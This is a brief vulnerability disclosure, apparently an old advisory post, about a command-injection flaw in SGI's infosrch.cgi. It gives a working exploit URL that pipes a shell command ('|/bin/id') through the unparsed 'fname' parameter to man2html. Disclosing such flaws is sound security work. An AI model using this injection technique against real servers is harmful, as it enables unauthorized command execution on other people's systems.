Exploit: http://expensive.sgi.box/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id no parsing is done on the 'fname' variable before being passed to man2html. (i.e. when cmd is 'getdoc' and db is 'man'). jared (rpc@inetarena.com)